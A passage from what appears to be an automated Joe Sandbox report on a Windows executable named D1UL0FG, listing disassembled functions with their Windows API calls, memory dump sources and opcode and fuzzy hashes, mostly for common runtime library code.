                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E512763B6D24286F768BA69940067A63D1BF44BA4F144774DD6CC77E6CF3CE501A600
                                                                                                                                                                                                                                          Function 00007FF67AEEC1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                                          • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                          • Instruction ID: 17fbc5e42ef2ef668aba8c102dc3d77ba500191a4eb61843f959d7192d02d942
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E11016372CA8181EA10AB25B8000696361FB85BF4F544371EEBD8B7F8CF3CD0418740
                                                                                                                                                                                                                                          Function 00007FF67AEEA9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9CE
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9D8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                          • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                          • Instruction ID: 85646e51a839b81afbd78bedd12939bfff1ff64ce7cfa50efb23786e544f88fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87E08C53F3D24282FF487BF2B8551381391AF88B41F0480B8C81DC72B2EE2DA885A700
                                                                                                                                                                                                                                          Function 00007FF67AEEABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00007FF67AEEAA45,?,?,00000000,00007FF67AEEAAFA), ref: 00007FF67AEEAC36
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF67AEEAA45,?,?,00000000,00007FF67AEEAAFA), ref: 00007FF67AEEAC40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                                          • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                          • Instruction ID: 62ec347c2cdc8720c7d5a1dc495eaf9659d4a608cb08c976f3b13fa9f078f71d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60217513F3C68242FE947761A49427D17929F84BA1F4842BDDA2EC77F5CE6CE445A300
                                                                                                                                                                                                                                          Function 00007FF67AEEBF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                          • Instruction ID: b194837250b3535b1dad5bfe3d63449e99ff124642fe13a609af642c13a671e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36410333A2C20187FA34AB19E45027977A0EB55B91F104275DACEC76E1CF2DF442EB91
                                                                                                                                                                                                                                          Function 00007FF8A9326905 Relevance: 1.6, APIs: 1, Instructions: 353COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                          • Opcode ID: 8461a2502f026d7e122df3db3e91d2553ea804ff5e6dd715b8e622b6a9c6ea1c
                                                                                                                                                                                                                                          • Instruction ID: ef4177ecb0ffc5e55d2b5cb3a6f714646b239cbdb0d3a0501d09274998c4b5eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8461a2502f026d7e122df3db3e91d2553ea804ff5e6dd715b8e622b6a9c6ea1c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2831A572A0EAC6A6FB649F16954023D73B1EF70BC8F545432DE0D87689DE38E8828741
                                                                                                                                                                                                                                          Function 00007FF67AED7F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                                                                                                          • Opcode ID: a7520e828596113b268e63b2d981a6b665d81183b45f3f30672e017b73aefd71
                                                                                                                                                                                                                                          • Instruction ID: 4b10d89de6633b26b97da5fb080bcc8084afead2998eb4522735428833d85c4d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7520e828596113b268e63b2d981a6b665d81183b45f3f30672e017b73aefd71
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D212923B2C65145FA10BB2265147BAA751BF85FC4F9C5070EE0C8B796CE7DE041E700
                                                                                                                                                                                                                                          Function 00007FF67AEEB9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                          • Instruction ID: aac1e15759fa5fca7e925e730cdfdce3b95f6b90006f6ca5f4228a464ba1c823
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7331AE33E3C64285FB517B65984137C2750AB40B94F4282B5E9AD833F2DF7DE851A720
                                                                                                                                                                                                                                          Function 00007FF67AEE6004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction ID: 22817d08d890a1a2226241b1902e71ad2f3a58f59e8328b87c6d5a7b5bd475b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96115123A3C64181FA60BF51A41027EA3A4BF45B80F5540B5EB4CD7AB6DF7DD940E750
                                                                                                                                                                                                                                          Function 00007FF67AEF63C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                          • Instruction ID: 90f5500a99a89a37c7e31c2ff7eb5a24c73b0e9f0b58a75dbb753a7c7154c6e2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50216573628AC287D7A1AF18E44037977A0FB84B54F544278EA9DC76E9DF3DD4049B01
                                                                                                                                                                                                                                          Function 00007FF67AEE042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                          • Instruction ID: 67d57be4f972b6edd41dcb2f958cc587ff1bbeb1c7af30665da0a5d1d4954090
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6801C463A6C74140FA04FF529A01069A7E1BF85FE0F0846B1EE5C97BE6DE3CE501A300
                                                                                                                                                                                                                                          Function 00007FF67AED9070 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF67AED45E4,00000000,00007FF67AED1985), ref: 00007FF67AED9439
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00007FF67AED6466,?,00007FF67AED336E), ref: 00007FF67AED9092
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2592636585-0
                                                                                                                                                                                                                                          • Opcode ID: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
                                                                                                                                                                                                                                          • Instruction ID: 610c12a7b91eeeeec6a624257fd8e4713549142ad5a20ac5200789b02f038f26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7140f7c55cf735ced6a4f02887063d730e60c19ae08c919a697b9dfe54228ee6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DD08C12B3824541EA94B767BA466295251ABC9BC0E98D075EE4D83B6ADC3CC0419B00
                                                                                                                                                                                                                                          Function 00007FF8A92E1CF8 Relevance: 1.3, APIs: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                          • Opcode ID: 5563a82993f3f8e44ea2e202436c36dc659c7fe328bd3c98202d5b79c02492c4
                                                                                                                                                                                                                                          • Instruction ID: 4a1bf2b779b5661323bf08d1e01685e5ca18e85cae4de152424f6249cff32354
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5563a82993f3f8e44ea2e202436c36dc659c7fe328bd3c98202d5b79c02492c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE318E72A0EAC696FB649F26954013D63B1EF70BC8F54A032DE0987789DE38E8918741
                                                                                                                                                                                                                                          Function 00007FF8A92F7EB0 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                          • Opcode ID: f8a161ca16946112414120da3da362b423baedddf845a4f9c426056871324c08
                                                                                                                                                                                                                                          • Instruction ID: fd594038d59d686154875ddcb7e023d0b848bf758bcb6720803879813d57cd51
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8a161ca16946112414120da3da362b423baedddf845a4f9c426056871324c08
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99217A32A0878096E754CF26E5806ADB7A4FB88BD0F148135EB9C83B69CF7CD165CB00
                                                                                                                                                                                                                                          Function 00007FF67AEEEC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
